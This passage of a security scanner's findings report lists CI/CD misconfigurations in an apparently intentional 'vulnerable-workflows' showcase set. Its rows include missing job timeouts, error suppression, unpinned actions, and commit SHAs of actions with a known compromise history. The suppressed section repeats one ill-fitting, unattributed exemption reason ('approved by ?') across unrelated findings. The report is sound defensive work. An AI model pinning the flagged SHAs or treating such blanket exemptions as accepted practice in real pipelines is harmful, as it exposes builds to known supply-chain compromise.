provenance_verification |
vulnerable-workflows/28-artifact-attacks.yml | Add SLSA provenance generation. For npm, use --provenance flag. For PyPI, use Trusted Publishing. Consider actions/attest-build-provenance. |
| โน๏ธ LOW | SCA-083 |
Dockerfile runs as root (no USER instruction)
container_security |
vulnerable-workflows/26-Dockerfile | Add a USER instruction to run as a non-root user: USER 1001:1001 |
| โน๏ธ LOW | SCA-BHV-FLOW |
No timeout-minutes on job 'aws-metadata-access'
behavioral_analysis |
vulnerable-workflows/20-cloud-metadata-imds.yml | Add timeout-minutes to every job (e.g., timeout-minutes: 15). |
| โน๏ธ LOW | SCA-BHV-FLOW |
Error suppression
behavioral_analysis |
vulnerable-workflows/14-runtime-cryptominer.yml | Add timeout-minutes to all jobs. Avoid deferred execution and error suppression in CI. All commands should run synchronously with visible output. |
| โน๏ธ LOW | SCA-BHV-FLOW |
Error suppression
behavioral_analysis |
vulnerable-workflows/14-runtime-cryptominer.yml | Add timeout-minutes to all jobs. Avoid deferred execution and error suppression in CI. All commands should run synchronously with visible output. |
| โน๏ธ LOW | SCA-BHV-FLOW |
Error suppression
behavioral_analysis |
vulnerable-workflows/14-runtime-cryptominer.yml | Add timeout-minutes to all jobs. Avoid deferred execution and error suppression in CI. All commands should run synchronously with visible output. |
| โน๏ธ LOW | SCA-BHV-FLOW |
No timeout-minutes on job 'test'
behavioral_analysis |
vulnerable-workflows/14-runtime-cryptominer.yml | Add timeout-minutes to every job (e.g., timeout-minutes: 15). |
| โน๏ธ LOW | SCA-BHV-FLOW |
No timeout-minutes on job 'deploy'
behavioral_analysis |
vulnerable-workflows/10-oidc-abuse.yml | Add timeout-minutes to every job (e.g., timeout-minutes: 15). |
| โน๏ธ LOW | SCA-BHV-FLOW |
No timeout-minutes on job 'build-container'
behavioral_analysis |
vulnerable-workflows/26-container-attacks.yml | Add timeout-minutes to every job (e.g., timeout-minutes: 15). |
| โน๏ธ LOW | SCA-BHV-FLOW |
No timeout-minutes on job 'build'
behavioral_analysis |
vulnerable-workflows/17-egress-exfiltration.yml | Add timeout-minutes to every job (e.g., timeout-minutes: 15). |
| โน๏ธ LOW | SCA-BHV-FLOW |
No timeout-minutes on job 'build-checks'
behavioral_analysis |
vulnerable-workflows/37-build-system-compromise.yml | Add timeout-minutes to every job (e.g., timeout-minutes: 15). |
| โน๏ธ LOW | SCA-BHV-FLOW |
No timeout-minutes on job 'test'
behavioral_analysis |
vulnerable-workflows/04-network-exfiltration.yml | Add timeout-minutes to every job (e.g., timeout-minutes: 15). |
| โน๏ธ LOW | SCA-BHV-FLOW |
No timeout-minutes on job 'release'
behavioral_analysis |
vulnerable-workflows/35-dispatch-codeowners.yml | Add timeout-minutes to every job (e.g., timeout-minutes: 15). |
| โน๏ธ LOW | SCA-BHV-FLOW |
No timeout-minutes on job 'post-ci-deploy'
behavioral_analysis |
vulnerable-workflows/35-dispatch-codeowners.yml | Add timeout-minutes to every job (e.g., timeout-minutes: 15). |
| โน๏ธ LOW | SCA-BHV-FLOW |
No timeout-minutes on job 'build'
behavioral_analysis |
vulnerable-workflows/09-container-escape.yml | Add timeout-minutes to every job (e.g., timeout-minutes: 15). |
| โน๏ธ LOW | SCA-BHV-FLOW |
No timeout-minutes on job 'load-models'
behavioral_analysis |
vulnerable-workflows/33-ml-model-risks.yml | Add timeout-minutes to every job (e.g., timeout-minutes: 15). |
| โน๏ธ LOW | SCA-BHV-FLOW |
No timeout-minutes on job 'build'
behavioral_analysis |
vulnerable-workflows/36-additional-malicious-packages.yml | Add timeout-minutes to every job (e.g., timeout-minutes: 15). |
| โน๏ธ LOW | SCA-BHV-FLOW |
Error suppression
behavioral_analysis |
vulnerable-workflows/19-teampcp-indicators.yml | Add timeout-minutes to all jobs. Avoid deferred execution and error suppression in CI. All commands should run synchronously with visible output. |
| โน๏ธ LOW | SCA-BHV-FLOW |
Error suppression
behavioral_analysis |
vulnerable-workflows/19-teampcp-indicators.yml | Add timeout-minutes to all jobs. Avoid deferred execution and error suppression in CI. All commands should run synchronously with visible output. |
| โน๏ธ LOW | SCA-BHV-FLOW |
No timeout-minutes on job 'compromised-trivy-scan'
behavioral_analysis |
vulnerable-workflows/19-teampcp-indicators.yml | Add timeout-minutes to every job (e.g., timeout-minutes: 15). |
| โน๏ธ LOW | SCA-BHV-FLOW |
No timeout-minutes on job 'imposter-commit-check'
behavioral_analysis |
vulnerable-workflows/19-teampcp-indicators.yml | Add timeout-minutes to every job (e.g., timeout-minutes: 15). |
| โน๏ธ LOW | SCA-BHV-FLOW |
No timeout-minutes on job 'deploy-staging'
behavioral_analysis |
vulnerable-workflows/25-reusable-workflow-attacks.yml | Add timeout-minutes to every job (e.g., timeout-minutes: 15). |
| โน๏ธ LOW | SCA-BHV-FLOW |
No timeout-minutes on job 'security-scan'
behavioral_analysis |
vulnerable-workflows/25-reusable-workflow-attacks.yml | Add timeout-minutes to every job (e.g., timeout-minutes: 15). |
| โน๏ธ LOW | SCA-BHV-FLOW |
No timeout-minutes on job 'build-and-publish'
behavioral_analysis |
vulnerable-workflows/25-reusable-workflow-attacks.yml | Add timeout-minutes to every job (e.g., timeout-minutes: 15). |
| โน๏ธ LOW | SCA-BHV-FLOW |
No timeout-minutes on job 'process-input'
behavioral_analysis |
vulnerable-workflows/25-reusable-workflow-attacks.yml | Add timeout-minutes to every job (e.g., timeout-minutes: 15). |
| โน๏ธ LOW | SCA-BHV-FLOW |
No timeout-minutes on job 'elevated-workflow'
behavioral_analysis |
vulnerable-workflows/25-reusable-workflow-attacks.yml | Add timeout-minutes to every job (e.g., timeout-minutes: 15). |
| โน๏ธ LOW | SCA-BHV-FLOW |
No timeout-minutes on job 'build'
behavioral_analysis |
vulnerable-workflows/05-cache-poisoning.yml | Add timeout-minutes to every job (e.g., timeout-minutes: 15). |
| โน๏ธ LOW | SCA-BHV-FLOW |
No timeout-minutes on job 'deploy-preview'
behavioral_analysis |
vulnerable-workflows/27-oidc-token-abuse.yml | Add timeout-minutes to every job (e.g., timeout-minutes: 15). |
| โน๏ธ LOW | SCA-BHV-FLOW |
No timeout-minutes on job 'build-on-self-hosted'
behavioral_analysis |
vulnerable-workflows/23-self-hosted-runner.yml | Add timeout-minutes to every job (e.g., timeout-minutes: 15). |
| โน๏ธ LOW | SCA-BHV-FLOW |
No timeout-minutes on job 'test-on-self-hosted'
behavioral_analysis |
vulnerable-workflows/23-self-hosted-runner.yml | Add timeout-minutes to every job (e.g., timeout-minutes: 15). |
| โน๏ธ LOW | SCA-BHV-FLOW |
No timeout-minutes on job 'train-model'
behavioral_analysis |
vulnerable-workflows/21-ai-credential-exposure.yml | Add timeout-minutes to every job (e.g., timeout-minutes: 15). |
| โน๏ธ LOW | SCA-BHV-FLOW |
No timeout-minutes on job 'install-deps'
behavioral_analysis |
vulnerable-workflows/29-dependency-confusion.yml | Add timeout-minutes to every job (e.g., timeout-minutes: 15). |
| โน๏ธ LOW | SCA-BHV-FLOW |
No timeout-minutes on job 'build'
behavioral_analysis |
vulnerable-workflows/11-artifact-poisoning.yml | Add timeout-minutes to every job (e.g., timeout-minutes: 15). |
| โน๏ธ LOW | SCA-BHV-FLOW |
No timeout-minutes on job 'deploy'
behavioral_analysis |
vulnerable-workflows/11-artifact-poisoning.yml | Add timeout-minutes to every job (e.g., timeout-minutes: 15). |
| โน๏ธ LOW | SCA-BHV-FLOW |
No timeout-minutes on job 'deploy'
behavioral_analysis |
vulnerable-workflows/03-secret-exposure.yml | Add timeout-minutes to every job (e.g., timeout-minutes: 15). |
| โน๏ธ LOW | SCA-BHV-FLOW |
No timeout-minutes on job 'test'
behavioral_analysis |
vulnerable-workflows/15-behavioral-obfuscation.yml | Add timeout-minutes to every job (e.g., timeout-minutes: 15). |
| โน๏ธ LOW | SCA-BHV-FLOW |
No timeout-minutes on job 'setup'
behavioral_analysis |
vulnerable-workflows/13-binary-dropper.yml | Add timeout-minutes to every job (e.g., timeout-minutes: 15). |
| โน๏ธ LOW | SCA-BHV-FLOW |
No timeout-minutes on job 'process-issue'
behavioral_analysis |
vulnerable-workflows/24-output-injection.yml | Add timeout-minutes to every job (e.g., timeout-minutes: 15). |
| โน๏ธ LOW | SCA-BHV-FLOW |
No timeout-minutes on job 'build-and-publish'
behavioral_analysis |
vulnerable-workflows/28-artifact-attacks.yml | Add timeout-minutes to every job (e.g., timeout-minutes: 15). |
| โน๏ธ LOW | SCA-BHV-FLOW |
No timeout-minutes on job 'deploy-from-artifact'
behavioral_analysis |
vulnerable-workflows/28-artifact-attacks.yml | Add timeout-minutes to every job (e.g., timeout-minutes: 15). |
| โน๏ธ LOW | SCA-BHV-FLOW |
No timeout-minutes on job 'build'
behavioral_analysis |
vulnerable-workflows/01-compromised-action.yml | Add timeout-minutes to every job (e.g., timeout-minutes: 15). |
| โน๏ธ LOW | SCA-BHV-FLOW |
No timeout-minutes on job 'run-tests'
behavioral_analysis |
vulnerable-workflows/34-network-egress-anomaly.yml | Add timeout-minutes to every job (e.g., timeout-minutes: 15). |
| โน๏ธ LOW | SCA-BHV-FLOW |
No timeout-minutes on job 'build'
behavioral_analysis |
vulnerable-workflows/31-circleci-config.yml | Add timeout-minutes to every job (e.g., timeout-minutes: 15). |
| โน๏ธ LOW | SCA-BHV-FLOW |
No timeout-minutes on job 'deploy'
behavioral_analysis |
vulnerable-workflows/31-circleci-config.yml | Add timeout-minutes to every job (e.g., timeout-minutes: 15). |
| โน๏ธ LOW | SCA-BHV-FLOW |
No timeout-minutes on job 'auto-review'
behavioral_analysis |
vulnerable-workflows/02-pwn-request.yml | Add timeout-minutes to every job (e.g., timeout-minutes: 15). |
| โน๏ธ LOW | SCA-BHV-FLOW |
No timeout-minutes on job 'build-frontend'
behavioral_analysis |
vulnerable-workflows/22-polyfill-cdn-attack.yml | Add timeout-minutes to every job (e.g., timeout-minutes: 15). |
| โน๏ธ LOW | SCA-BHV-FLOW |
No timeout-minutes on job 'security-scan'
behavioral_analysis |
vulnerable-workflows/12-reusable-workflow-trust.yml | Add timeout-minutes to every job (e.g., timeout-minutes: 15). |
| โน๏ธ LOW | SCA-BHV-FLOW |
No timeout-minutes on job 'deploy'
behavioral_analysis |
vulnerable-workflows/12-reusable-workflow-trust.yml | Add timeout-minutes to every job (e.g., timeout-minutes: 15). |
| โน๏ธ LOW | SCA-BHV-FLOW |
No timeout-minutes on job 'lint'
behavioral_analysis |
vulnerable-workflows/06-permission-escalation.yml | Add timeout-minutes to every job (e.g., timeout-minutes: 15). |
| โน๏ธ LOW | SCA-BHV-FLOW |
No timeout-minutes on job 'test'
behavioral_analysis |
vulnerable-workflows/06-permission-escalation.yml | Add timeout-minutes to every job (e.g., timeout-minutes: 15). |
| โน๏ธ LOW | SCA-BHV-FLOW |
No timeout-minutes on job 'deploy'
behavioral_analysis |
vulnerable-workflows/06-permission-escalation.yml | Add timeout-minutes to every job (e.g., timeout-minutes: 15). |
| โน๏ธ LOW | SCA-BHV-FLOW |
Error suppression
behavioral_analysis |
integrations/local-cli-scan.sh | Add timeout-minutes to all jobs. Avoid deferred execution and error suppression in CI. All commands should run synchronously with visible output. |
| โน๏ธ LOW | SCA-BHV-FLOW |
Error suppression
behavioral_analysis |
integrations/local-cli-scan.sh | Add timeout-minutes to all jobs. Avoid deferred execution and error suppression in CI. All commands should run synchronously with visible output. |
| โน๏ธ LOW | SCA-BHV-FLOW |
Error suppression
behavioral_analysis |
integrations/local-cli-scan.sh | Add timeout-minutes to all jobs. Avoid deferred execution and error suppression in CI. All commands should run synchronously with visible output. |
| โน๏ธ LOW | SCA-105 |
[JENKINS] Agent: any (runs on any available node)
cross_platform_ci |
integrations/Jenkinsfile | Review and remediate this jenkins configuration issue. |
| โน๏ธ LOW | SCA-105 |
[JENKINS] Checkout SCM without options
cross_platform_ci |
integrations/Jenkinsfile | Review and remediate this jenkins configuration issue. |
| โน๏ธ LOW | SCA-105 |
[JENKINS] Agent: any (runs on any available node)
cross_platform_ci |
vulnerable-workflows/16-Jenkinsfile | Review and remediate this jenkins configuration issue. |
| Severity | Rule ID | Finding | Location | Remediation |
|---|---|---|---|---|
| ๐ฌ INFO | SCA-COMP-HIST |
Action with compromise history: aquasecurity/trivy-action@f77738448eec70113cf711656914b61905b3bd47
compromised_actions |
vulnerable-workflows/19-teampcp-indicators.yml | Verify the pinned SHA corresponds to a known-good release. Consider alternative actions. |
| ๐ฌ INFO | SCA-COMP-HIST |
Action with compromise history: aquasecurity/setup-trivy@8afa9b9f9183b4e00c46e2b82d34047e3c177bd0
compromised_actions |
vulnerable-workflows/19-teampcp-indicators.yml | Verify the pinned SHA corresponds to a known-good release. Consider alternative actions. |
| ๐ฌ INFO | SCA-COMP-HIST |
Action with compromise history: tj-actions/changed-files@ae82ed004850e9bfa8b2089b109a1e27e0eee893
compromised_actions |
vulnerable-workflows/01-compromised-action.yml | Verify the pinned SHA corresponds to a known-good release. Consider alternative actions. |
These findings were suppressed by .scg-config.yml or inline # scg-ignore comments. They are preserved here for the compliance audit trail.
| Severity | Rule ID | Finding | Location | Exemption Reason |
|---|---|---|---|---|
| ๐ถ MEDIUM | SCA-033 |
Mutable tag reference: anshumaan-10/supply-chain-guardian@v4
compromised_actions โ Exempted: Own action - mutable tag v4 is intentional for showcase pipeline (approved by ?) |
.github/workflows/showcase-pipeline.yml | Pin to a full commit SHA: uses: owner/action@<40-char-sha> # version comment |
| ๐ถ MEDIUM | SCA-033 |
Mutable tag reference: anshumaan-10/supply-chain-guardian@v4
compromised_actions โ Exempted: Own action - mutable tag v4 is intentional for showcase pipeline (approved by ?) |
.github/workflows/showcase-pipeline.yml | Pin to a full commit SHA: uses: owner/action@<40-char-sha> # version comment |
| ๐ถ MEDIUM | SCA-033 |
Mutable tag reference: anshumaan-10/supply-chain-guardian@v4
compromised_actions โ Exempted: Own action - mutable tag v4 is intentional for showcase pipeline (approved by ?) |
.github/workflows/showcase-pipeline.yml | Pin to a full commit SHA: uses: owner/action@<40-char-sha> # version comment |
| ๐ถ MEDIUM | SCA-033 |
Mutable tag reference: anshumaan-10/supply-chain-guardian@v4
compromised_actions โ Exempted: Own action - mutable tag v4 is intentional for showcase pipeline (approved by ?) |
.github/workflows/showcase-pipeline.yml | Pin to a full commit SHA: uses: owner/action@<40-char-sha> # version comment |
| ๐ถ MEDIUM | SCA-033 |
Mutable tag reference: anshumaan-10/supply-chain-guardian@v4
compromised_actions โ Exempted: Own action - mutable tag v4 is intentional for showcase pipeline (approved by ?) |
.github/workflows/showcase-pipeline.yml | Pin to a full commit SHA: uses: owner/action@<40-char-sha> # version comment |
| ๐ถ MEDIUM | SCA-033 |
Mutable tag reference: anshumaan-10/supply-chain-guardian@v4
compromised_actions โ Exempted: Own action - mutable tag v4 is intentional for showcase pipeline (approved by ?) |
.github/workflows/showcase-pipeline.yml | Pin to a full commit SHA: uses: owner/action@<40-char-sha> # version comment |
| ๐ถ MEDIUM | SCA-033 |
Mutable tag reference: actions/checkout@v4
compromised_actions โ Exempted: Own action - mutable tag v4 is intentional for showcase pipeline (approved by ?) |
vulnerable-workflows/20-cloud-metadata-imds.yml | Pin to a full commit SHA: uses: owner/action@<40-char-sha> # version comment |
| ๐ถ MEDIUM | SCA-033 |
Mutable tag reference: actions/checkout@v4
compromised_actions โ Exempted: Own action - mutable tag v4 is intentional for showcase pipeline (approved by ?) |
vulnerable-workflows/14-runtime-cryptominer.yml | Pin to a full commit SHA: uses: owner/action@<40-char-sha> # version comment |
| ๐ถ MEDIUM | SCA-033 |
Mutable tag reference: actions/checkout@v4
compromised_actions โ Exempted: Own action - mutable tag v4 is intentional for showcase pipeline (approved by ?) |
vulnerable-workflows/10-oidc-abuse.yml | Pin to a full commit SHA: uses: owner/action@<40-char-sha> # version comment |
| ๐ถ MEDIUM | SCA-033 |
Mutable tag reference: aws-actions/configure-aws-credentials@v4
compromised_actions โ Exempted: Own action - mutable tag v4 is intentional for showcase pipeline (approved by ?) |
vulnerable-workflows/10-oidc-abuse.yml | Pin to a full commit SHA: uses: owner/action@<40-char-sha> # version comment |
| ๐ถ MEDIUM | SCA-033 |
Mutable tag reference: actions/checkout@v4
compromised_actions โ Exempted: Own action - mutable tag v4 is intentional for showcase pipeline (approved by ?) |
vulnerable-workflows/26-container-attacks.yml | Pin to a full commit SHA: uses: owner/action@<40-char-sha> # version comment |
| ๐ถ MEDIUM | SCA-033 |
Mutable tag reference: actions/checkout@v4
compromised_actions โ Exempted: Own action - mutable tag v4 is intentional for showcase pipeline (approved by ?) |
vulnerable-workflows/17-egress-exfiltration.yml | Pin to a full commit SHA: uses: owner/action@<40-char-sha> # version comment |
| ๐ถ MEDIUM | SCA-033 |
Mutable tag reference: actions/checkout@v4
compromised_actions โ Exempted: Own action - mutable tag v4 is intentional for showcase pipeline (approved by ?) |
vulnerable-workflows/37-build-system-compromise.yml | Pin to a full commit SHA: uses: owner/action@<40-char-sha> # version comment |
| ๐ถ MEDIUM | SCA-033 |
Mutable tag reference: actions/checkout@v4
compromised_actions โ Exempted: Own action - mutable tag v4 is intentional for showcase pipeline (approved by ?) |
vulnerable-workflows/04-network-exfiltration.yml | Pin to a full commit SHA: uses: owner/action@<40-char-sha> # version comment |
| ๐ถ MEDIUM | SCA-033 |
Mutable tag reference: actions/checkout@v4
compromised_actions โ Exempted: Own action - mutable tag v4 is intentional for showcase pipeline (approved by ?) |
vulnerable-workflows/35-dispatch-codeowners.yml | Pin to a full commit SHA: uses: owner/action@<40-char-sha> # version comment |
| ๐ถ MEDIUM | SCA-033 |
Mutable tag reference: actions/checkout@v4
compromised_actions โ Exempted: Own action - mutable tag v4 is intentional for showcase pipeline (approved by ?) |
vulnerable-workflows/35-dispatch-codeowners.yml | Pin to a full commit SHA: uses: owner/action@<40-char-sha> # version comment |
| ๐ถ MEDIUM | SCA-033 |
Mutable tag reference: actions/checkout@v4
compromised_actions โ Exempted: Own action - mutable tag v4 is intentional for showcase pipeline (approved by ?) |
vulnerable-workflows/09-container-escape.yml | Pin to a full commit SHA: uses: owner/action@<40-char-sha> # version comment |
| ๐ถ MEDIUM | SCA-033 |
Mutable tag reference: actions/checkout@v4
compromised_actions โ Exempted: Own action - mutable tag v4 is intentional for showcase pipeline (approved by ?) |
vulnerable-workflows/33-ml-model-risks.yml | Pin to a full commit SHA: uses: owner/action@<40-char-sha> # version comment |
| ๐ถ MEDIUM | SCA-033 |
Mutable tag reference: actions/checkout@v4
compromised_actions โ Exempted: Own action - mutable tag v4 is intentional for showcase pipeline (approved by ?) |
vulnerable-workflows/36-additional-malicious-packages.yml | Pin to a full commit SHA: uses: owner/action@<40-char-sha> # version comment |
| ๐ถ MEDIUM | SCA-033 |
Mutable tag reference: actions/checkout@v4
compromised_actions โ Exempted: Own action - mutable tag v4 is intentional for showcase pipeline (approved by ?) |
vulnerable-workflows/19-teampcp-indicators.yml | Pin to a full commit SHA: uses: owner/action@<40-char-sha> # version comment |
| ๐ถ MEDIUM | SCA-033 |
Mutable tag reference: Checkmarx/kics-github-action@v2
compromised_actions โ Exempted: Own action - mutable tag v4 is intentional for showcase pipeline (approved by ?) |
vulnerable-workflows/19-teampcp-indicators.yml | Pin to a full commit SHA: uses: owner/action@<40-char-sha> # version comment |
| ๐ถ MEDIUM | SCA-033 |
Mutable tag reference: actions/checkout@v4
compromised_actions โ Exempted: Own action - mutable tag v4 is intentional for showcase pipeline (approved by ?) |
vulnerable-workflows/19-teampcp-indicators.yml | Pin to a full commit SHA: uses: owner/action@<40-char-sha> # version comment |
| ๐ถ MEDIUM | SCA-033 |
Mutable tag reference: org-name/shared-workflows/.github/workflows/deploy.yml@main
compromised_actions โ Exempted: Own action - mutable tag v4 is intentional for showcase pipeline (approved by ?) |
vulnerable-workflows/25-reusable-workflow-attacks.yml | Pin to a full commit SHA: uses: owner/action@<40-char-sha> # version comment |
| ๐ถ MEDIUM | SCA-033 |
Mutable tag reference: external-security-org/scanners/.github/workflows/sast.yml@v2
compromised_actions โ Exempted: Own action - mutable tag v4 is intentional for showcase pipeline (approved by ?) |
vulnerable-workflows/25-reusable-workflow-attacks.yml | Pin to a full commit SHA: uses: owner/action@<40-char-sha> # version comment |
| ๐ถ MEDIUM | SCA-033 |
Mutable tag reference: org-name/shared-workflows/.github/workflows/build.yml@main
compromised_actions โ Exempted: Own action - mutable tag v4 is intentional for showcase pipeline (approved by ?) |
vulnerable-workflows/25-reusable-workflow-attacks.yml | Pin to a full commit SHA: uses: owner/action@<40-char-sha> # version comment |
| ๐ถ MEDIUM | SCA-033 |
Mutable tag reference: actions/checkout@v4
compromised_actions โ Exempted: Own action - mutable tag v4 is intentional for showcase pipeline (approved by ?) |
vulnerable-workflows/25-reusable-workflow-attacks.yml | Pin to a full commit SHA: uses: owner/action@<40-char-sha> # version comment |
| ๐ถ MEDIUM | SCA-033 |
Mutable tag reference: org-name/shared-workflows/.github/workflows/release.yml@main
compromised_actions โ Exempted: Own action - mutable tag v4 is intentional for showcase pipeline (approved by ?) |
vulnerable-workflows/25-reusable-workflow-attacks.yml | Pin to a full commit SHA: uses: owner/action@<40-char-sha> # version comment |
| ๐ถ MEDIUM | SCA-033 |
Mutable tag reference: actions/checkout@v4
compromised_actions โ Exempted: Own action - mutable tag v4 is intentional for showcase pipeline (approved by ?) |
vulnerable-workflows/05-cache-poisoning.yml | Pin to a full commit SHA: uses: owner/action@<40-char-sha> # version comment |
| ๐ถ MEDIUM | SCA-033 |
Mutable tag reference: actions/cache@v3
compromised_actions โ Exempted: Own action - mutable tag v4 is intentional for showcase pipeline (approved by ?) |
vulnerable-workflows/05-cache-poisoning.yml | Pin to a full commit SHA: uses: owner/action@<40-char-sha> # version comment |
| ๐ถ MEDIUM | SCA-033 |
Mutable tag reference: actions/cache@v3
compromised_actions โ Exempted: Own action - mutable tag v4 is intentional for showcase pipeline (approved by ?) |
vulnerable-workflows/05-cache-poisoning.yml | Pin to a full commit SHA: uses: owner/action@<40-char-sha> # version comment |
| ๐ถ MEDIUM | SCA-033 |
Mutable tag reference: actions/checkout@v4
compromised_actions โ Exempted: Own action - mutable tag v4 is intentional for showcase pipeline (approved by ?) |
vulnerable-workflows/27-oidc-token-abuse.yml | Pin to a full commit SHA: uses: owner/action@<40-char-sha> # version comment |
| ๐ถ MEDIUM | SCA-033 |
Mutable tag reference: aws-actions/configure-aws-credentials@v4
compromised_actions โ Exempted: Own action - mutable tag v4 is intentional for showcase pipeline (approved by ?) |
vulnerable-workflows/27-oidc-token-abuse.yml | Pin to a full commit SHA: uses: owner/action@<40-char-sha> # version comment |
| ๐ถ MEDIUM | SCA-033 |
Mutable tag reference: actions/checkout@v4
compromised_actions โ Exempted: Own action - mutable tag v4 is intentional for showcase pipeline (approved by ?) |
vulnerable-workflows/23-self-hosted-runner.yml | Pin to a full commit SHA: uses: owner/action@<40-char-sha> # version comment |
| โ ๏ธ HIGH | SCA-051 |
Action without version pin: super-linter/super-linter
compromised_actions โ Exempted: Own first-party action from same organization (approved by ?) |
vulnerable-workflows/23-self-hosted-runner.yml | Always pin actions to a specific commit SHA. |
| โ ๏ธ HIGH | SCA-051 |
Action without version pin: peaceiris/actions-gh-pages
compromised_actions โ Exempted: Own first-party action from same organization (approved by ?) |
vulnerable-workflows/23-self-hosted-runner.yml | Always pin actions to a specific commit SHA. |
| ๐ถ MEDIUM | SCA-033 |
Mutable tag reference: aquasecurity/trivy-action@master
compromised_actions โ Exempted: Own action - mutable tag v4 is intentional for showcase pipeline (approved by ?) |
vulnerable-workflows/23-self-hosted-runner.yml | Pin to a full commit SHA: uses: owner/action@<40-char-sha> # version comment |
| ๐ถ MEDIUM | SCA-033 |
Mutable tag reference: actions/checkout@v4
compromised_actions โ Exempted: Own action - mutable tag v4 is intentional for showcase pipeline (approved by ?) |
vulnerable-workflows/23-self-hosted-runner.yml | Pin to a full commit SHA: uses: owner/action@<40-char-sha> # version comment |
| ๐ถ MEDIUM | SCA-033 |
Mutable tag reference: actions/checkout@v4
compromised_actions โ Exempted: Own action - mutable tag v4 is intentional for showcase pipeline (approved by ?) |
vulnerable-workflows/21-ai-credential-exposure.yml | Pin to a full commit SHA: uses: owner/action@<40-char-sha> # version comment |
| ๐ถ MEDIUM | SCA-033 |
Mutable tag reference: actions/checkout@v4
compromised_actions โ Exempted: Own action - mutable tag v4 is intentional for showcase pipeline (approved by ?) |
vulnerable-workflows/29-dependency-confusion.yml | Pin to a full commit SHA: uses: owner/action@<40-char-sha> # version comment |
| ๐ถ MEDIUM | SCA-033 |
Mutable tag reference: actions/checkout@v4
compromised_actions โ Exempted: Own action - mutable tag v4 is intentional for showcase pipeline (approved by ?) |
vulnerable-workflows/11-artifact-poisoning.yml | Pin to a full commit SHA: uses: owner/action@<40-char-sha> # version comment |
| ๐ถ MEDIUM | SCA-033 |
Mutable tag reference: actions/upload-artifact@v4
compromised_actions โ Exempted: Own action - mutable tag v4 is intentional for showcase pipeline (approved by ?) |
vulnerable-workflows/11-artifact-poisoning.yml | Pin to a full commit SHA: uses: owner/action@<40-char-sha> # version comment |
| ๐ถ MEDIUM | SCA-033 |
Mutable tag reference: actions/download-artifact@v4
compromised_actions โ Exempted: Own action - mutable tag v4 is intentional for showcase pipeline (approved by ?) |
vulnerable-workflows/11-artifact-poisoning.yml | Pin to a full commit SHA: uses: owner/action@<40-char-sha> # version comment |
| ๐ถ MEDIUM | SCA-033 |
Mutable tag reference: actions/checkout@v4
compromised_actions โ Exempted: Own action - mutable tag v4 is intentional for showcase pipeline (approved by ?) |
vulnerable-workflows/03-secret-exposure.yml | Pin to a full commit SHA: uses: owner/action@<40-char-sha> # version comment |
| ๐ถ MEDIUM | SCA-033 |
Mutable tag reference: actions/checkout@v4
compromised_actions โ Exempted: Own action - mutable tag v4 is intentional for showcase pipeline (approved by ?) |
vulnerable-workflows/15-behavioral-obfuscation.yml | Pin to a full commit SHA: uses: owner/action@<40-char-sha> # version comment |
| ๐ถ MEDIUM | SCA-033 |
Mutable tag reference: actions/checkout@v4
compromised_actions โ Exempted: Own action - mutable tag v4 is intentional for showcase pipeline (approved by ?) |
vulnerable-workflows/13-binary-dropper.yml | Pin to a full commit SHA: uses: owner/action@<40-char-sha> # version comment |
| ๐ถ MEDIUM | SCA-033 |
Mutable tag reference: actions/checkout@v4
compromised_actions โ Exempted: Own action - mutable tag v4 is intentional for showcase pipeline (approved by ?) |
vulnerable-workflows/24-output-injection.yml | Pin to a full commit SHA: uses: owner/action@<40-char-sha> # version comment |
| ๐ถ MEDIUM | SCA-033 |
Mutable tag reference: actions/github-script@v7
compromised_actions โ Exempted: Own action - mutable tag v4 is intentional for showcase pipeline (approved by ?) |
vulnerable-workflows/24-output-injection.yml | Pin to a full commit SHA: uses: owner/action@<40-char-sha> # version comment |
| ๐ถ MEDIUM | SCA-033 |
Mutable tag reference: actions/checkout@v4
compromised_actions โ Exempted: Own action - mutable tag v4 is intentional for showcase pipeline (approved by ?) |
vulnerable-workflows/28-artifact-attacks.yml | Pin to a full commit SHA: uses: owner/action@<40-char-sha> # version comment |
| ๐ถ MEDIUM | SCA-033 |
Mutable tag reference: actions/upload-artifact@v4
compromised_actions โ Exempted: Own action - mutable tag v4 is intentional for showcase pipeline (approved by ?) |
vulnerable-workflows/28-artifact-attacks.yml | Pin to a full commit SHA: uses: owner/action@<40-char-sha> # version comment |
| ๐ถ MEDIUM | SCA-033 |
Mutable tag reference: actions/upload-artifact@v4
compromised_actions โ Exempted: Own action - mutable tag v4 is intentional for showcase pipeline (approved by ?) |
vulnerable-workflows/28-artifact-attacks.yml | Pin to a full commit SHA: uses: owner/action@<40-char-sha> # version comment |
| ๐ถ MEDIUM | SCA-033 |
Mutable tag reference: actions/checkout@v4
compromised_actions โ Exempted: Own action - mutable tag v4 is intentional for showcase pipeline (approved by ?) |
vulnerable-workflows/01-compromised-action.yml | Pin to a full commit SHA: uses: owner/action@<40-char-sha> # version comment |
| ๐ถ MEDIUM | SCA-033 |
Mutable tag reference: actions/cache@v3
compromised_actions โ Exempted: Own action - mutable tag v4 is intentional for showcase pipeline (approved by ?) |
vulnerable-workflows/01-compromised-action.yml | Pin to a full commit SHA: uses: owner/action@<40-char-sha> # version comment |
| ๐ถ MEDIUM | SCA-033 |
Mutable tag reference: actions/checkout@v4
compromised_actions โ Exempted: Own action - mutable tag v4 is intentional for showcase pipeline (approved by ?) |
vulnerable-workflows/34-network-egress-anomaly.yml | Pin to a full commit SHA: uses: owner/action@<40-char-sha> # version comment |
| ๐ถ MEDIUM | SCA-033 |
Mutable tag reference: actions/checkout@v4
compromised_actions โ Exempted: Own action - mutable tag v4 is intentional for showcase pipeline (approved by ?) |
vulnerable-workflows/02-pwn-request.yml | Pin to a full commit SHA: uses: owner/action@<40-char-sha> # version comment |
| ๐ถ MEDIUM | SCA-033 |
Mutable tag reference: actions/checkout@v4
compromised_actions โ Exempted: Own action - mutable tag v4 is intentional for showcase pipeline (approved by ?) |
vulnerable-workflows/22-polyfill-cdn-attack.yml | Pin to a full commit SHA: uses: owner/action@<40-char-sha> # version comment |
| ๐ถ MEDIUM | SCA-033 |
Mutable tag reference: random-external-org/shared-workflows/.github/workflows/scan.yml@main
compromised_actions โ Exempted: Own action - mutable tag v4 is intentional for showcase pipeline (approved by ?) |
vulnerable-workflows/12-reusable-workflow-trust.yml | Pin to a full commit SHA: uses: owner/action@<40-char-sha> # version comment |
| ๐ถ MEDIUM | SCA-033 |
Mutable tag reference: actions/checkout@v4
compromised_actions โ Exempted: Own action - mutable tag v4 is intentional for showcase pipeline (approved by ?) |
vulnerable-workflows/06-permission-escalation.yml | Pin to a full commit SHA: uses: owner/action@<40-char-sha> # version comment |
| ๐ถ MEDIUM | SCA-033 |
Mutable tag reference: actions/checkout@v4
